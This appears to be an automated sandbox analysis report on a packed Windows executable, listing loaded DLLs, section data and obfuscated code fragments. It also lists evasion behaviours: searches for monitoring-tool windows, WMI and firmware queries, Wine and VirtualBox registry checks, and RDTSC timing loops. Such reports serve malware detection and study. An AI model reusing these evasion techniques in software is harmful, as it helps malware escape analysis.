Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1940,i,1303582193937569043,18141116409944036505,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1976 --field-trial-handle=1920,i,10785265456503200477,11409985625348319753,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior

Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: windows.shell.servicehostbuilder.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Section loaded: wkscli.dll	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: UmotQ1qjLq.exe

Static file information: File size 2993664 > 1048576

Source: UmotQ1qjLq.exe

Static PE information: Raw size of zcertcrx is bigger than: 0x100000 < 0x2b1600

Source:

Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: UmotQ1qjLq.exe, 00000000.00000002.2163497130.0000000006A32000.00000040.00000800.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\UmotQ1qjLq.exe

Unpacked PE file: 0.2.UmotQ1qjLq.exe.b10000.0.unpack :EW;.rsrc :W;.idata :W;zcertcrx:EW;urlflepf:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;zcertcrx:EW;urlflepf:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: UmotQ1qjLq.exe

Static PE information: real checksum: 0x2ded25 should be: 0x2e26e3

Source: UmotQ1qjLq.exe	Static PE information: section name:
Source: UmotQ1qjLq.exe	Static PE information: section name: .rsrc
Source: UmotQ1qjLq.exe	Static PE information: section name: .idata
Source: UmotQ1qjLq.exe	Static PE information: section name: zcertcrx
Source: UmotQ1qjLq.exe	Static PE information: section name: urlflepf
Source: UmotQ1qjLq.exe	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 0_2_00B4F000 push eax; mov dword ptr [esp], 5B5A5908h	0_2_00B4F005
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 0_2_00B1FE62 push 89FFFF80h; ret	0_2_00B1FE69
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 0_2_06A40571 push 4BA2CFFAh; mov dword ptr [esp], esi	0_2_06A451E6
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 0_2_06A40EA4 push 4325FB96h; mov dword ptr [esp], edx	0_2_06A40F0C
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 0_2_06A416A2 push edi; mov dword ptr [esp], ebp	0_2_06A434D5
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 0_2_06A5EEAA push 3800DEA1h; mov dword ptr [esp], ebp	0_2_06A5F37E
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 0_2_06A5EEAA push 50FA9645h; mov dword ptr [esp], ebx	0_2_06A5F3BD
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 0_2_06A5EEAA push eax; mov dword ptr [esp], 00000000h	0_2_06A5F52E
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 0_2_06A40E8B push 07CAF101h; mov dword ptr [esp], ebx	0_2_06A4322B
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 0_2_06A40E95 push edi; mov dword ptr [esp], 03023DCFh	0_2_06A411FF
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 0_2_06A40E95 push ecx; mov dword ptr [esp], esp	0_2_06A4231A
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 0_2_06A40E95 push 6D68A443h; mov dword ptr [esp], edi	0_2_06A42F73
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 0_2_06A44696 push eax; mov dword ptr [esp], edi	0_2_06A413DF
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 0_2_06A3E695 push esi; mov dword ptr [esp], eax	0_2_06A3F754
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 0_2_06A3E695 push 247ED9BBh; mov dword ptr [esp], ecx	0_2_06A3F779
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 0_2_06A4069D push edi; mov dword ptr [esp], ebx	0_2_06A421D8
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 0_2_06A40ED3 push esi; mov dword ptr [esp], eax	0_2_06A43107
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 0_2_06A42622 push ebp; mov dword ptr [esp], edi	0_2_06A42633
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 0_2_06A3EE3F push ebx; mov dword ptr [esp], edi	0_2_06A3EE46
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 0_2_06A3EE1F push edx; mov dword ptr [esp], eax	0_2_06A3F6A8
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 0_2_06A3EE1F push 2E751C2Bh; mov dword ptr [esp], ebx	0_2_06A3F793
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 0_2_06A41E1A push 7C18D32Bh; mov dword ptr [esp], esi	0_2_06A41E26
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 0_2_06A41E1A push eax; mov dword ptr [esp], edi	0_2_06A44D0C
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 0_2_06A3C666 push 22DE33B2h; mov dword ptr [esp], edx	0_2_06A3C66E
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 0_2_06A42643 push 644E41E7h; mov dword ptr [esp], ebx	0_2_06A45098
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 0_2_06A3EE4E push eax; mov dword ptr [esp], edi	0_2_06A3F615
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 0_2_06A4464A push edx; mov dword ptr [esp], 38FB5483h	0_2_06A4464B
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 0_2_06A4464A push edx; mov dword ptr [esp], 2341322Dh	0_2_06A44656
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 0_2_06A41E50 push ebx; mov dword ptr [esp], esi	0_2_06A44AB8
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 0_2_06A3EE5E push 2E520E10h; mov dword ptr [esp], ebx	0_2_06A3F564
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 0_2_06A3CFA0 push 2F399BCAh; mov dword ptr [esp], edi	0_2_06A3CFAD

Source: UmotQ1qjLq.exe

Static PE information: section name: entropy: 7.987442000350296

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\UmotQ1qjLq.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\UmotQ1qjLq.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\UmotQ1qjLq.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: B69736 second address: B6973A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: B6973A second address: B69760 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4760DF984Dh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f jmp 00007F4760DF984Bh 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: B69760 second address: B69764 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: B69764 second address: B69020 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 pushad 0x00000009 or edi, dword ptr [ebp+122D3DC7h] 0x0000000f jmp 00007F4760DF9854h 0x00000014 popad 0x00000015 pushad 0x00000016 sub dword ptr [ebp+122D1D48h], eax 0x0000001c mov dword ptr [ebp+122D2008h], edx 0x00000022 popad 0x00000023 push dword ptr [ebp+122D0479h] 0x00000029 add dword ptr [ebp+122D20A6h], esi 0x0000002f call dword ptr [ebp+122D1E7Ch] 0x00000035 pushad 0x00000036 mov dword ptr [ebp+122D1CBBh], eax 0x0000003c xor eax, eax 0x0000003e cmc 0x0000003f je 00007F4760DF985Ah 0x00000045 mov edx, dword ptr [esp+28h] 0x00000049 xor dword ptr [ebp+122D1CBBh], esi 0x0000004f mov dword ptr [ebp+122D3C1Bh], eax 0x00000055 stc 0x00000056 mov esi, 0000003Ch 0x0000005b jmp 00007F4760DF9850h 0x00000060 pushad 0x00000061 mov eax, dword ptr [ebp+122D3C37h] 0x00000067 popad 0x00000068 add esi, dword ptr [esp+24h] 0x0000006c jmp 00007F4760DF984Fh 0x00000071 lodsw 0x00000073 sub dword ptr [ebp+122D1D0Bh], ebx 0x00000079 add dword ptr [ebp+122D1D0Bh], ebx 0x0000007f add eax, dword ptr [esp+24h] 0x00000083 cmc 0x00000084 mov ebx, dword ptr [esp+24h] 0x00000088 jmp 00007F4760DF9851h 0x0000008d nop 0x0000008e push eax 0x0000008f push edx 0x00000090 pushad 0x00000091 push eax 0x00000092 pop eax 0x00000093 push eax 0x00000094 push edx 0x00000095 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: B69020 second address: B69025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: B69025 second address: B69049 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4760DF9857h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop ecx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: CD0179 second address: CD017D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: CD017D second address: CD018E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jns 00007F4760DF9846h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: CE8F61 second address: CE8F65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: CE8F65 second address: CE8F6F instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4760DF984Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: CEB93E second address: CEB99E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F4760DF1545h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007F4760DF1538h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 00000016h 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d push 00000000h 0x0000002f push ecx 0x00000030 push ecx 0x00000031 mov dword ptr [ebp+122D1D70h], eax 0x00000037 pop esi 0x00000038 pop edx 0x00000039 push A6973E27h 0x0000003e push eax 0x0000003f push edx 0x00000040 jne 00007F4760DF153Ch 0x00000046 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: CEB99E second address: CEB9A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: CEB9A4 second address: CEBA17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 5968C259h 0x0000000f push esi 0x00000010 mov cx, C54Eh 0x00000014 pop esi 0x00000015 push 00000003h 0x00000017 mov ecx, dword ptr [ebp+122D2E93h] 0x0000001d mov dword ptr [ebp+122D202Ah], edx 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push edi 0x00000028 call 00007F4760DF1538h 0x0000002d pop edi 0x0000002e mov dword ptr [esp+04h], edi 0x00000032 add dword ptr [esp+04h], 00000016h 0x0000003a inc edi 0x0000003b push edi 0x0000003c ret 0x0000003d pop edi 0x0000003e ret 0x0000003f push 00000003h 0x00000041 push 00000000h 0x00000043 push eax 0x00000044 call 00007F4760DF1538h 0x00000049 pop eax 0x0000004a mov dword ptr [esp+04h], eax 0x0000004e add dword ptr [esp+04h], 00000017h 0x00000056 inc eax 0x00000057 push eax 0x00000058 ret 0x00000059 pop eax 0x0000005a ret 0x0000005b mov edi, dword ptr [ebp+122D3EF7h] 0x00000061 push 66CC430Ch 0x00000066 push eax 0x00000067 pushad 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: CEBA17 second address: CEBA5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F4760DF9846h 0x0000000a popad 0x0000000b pop eax 0x0000000c add dword ptr [esp], 5933BCF4h 0x00000013 push 00000000h 0x00000015 push ebx 0x00000016 call 00007F4760DF9848h 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], ebx 0x00000020 add dword ptr [esp+04h], 00000014h 0x00000028 inc ebx 0x00000029 push ebx 0x0000002a ret 0x0000002b pop ebx 0x0000002c ret 0x0000002d mov dword ptr [ebp+122D1CD8h], eax 0x00000033 lea ebx, dword ptr [ebp+12456858h] 0x00000039 mov di, bx 0x0000003c xchg eax, ebx 0x0000003d pushad 0x0000003e jo 00007F4760DF984Ch 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: CEBA5F second address: CEBA67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: CFEC1E second address: CFEC31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jp 00007F4760DF9846h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: CFEC31 second address: CFEC36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D0E330 second address: D0E334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D0E334 second address: D0E371 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4760DF153Ah 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F4760DF153Dh 0x00000013 jmp 00007F4760DF1547h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push esi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D0E371 second address: D0E376 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
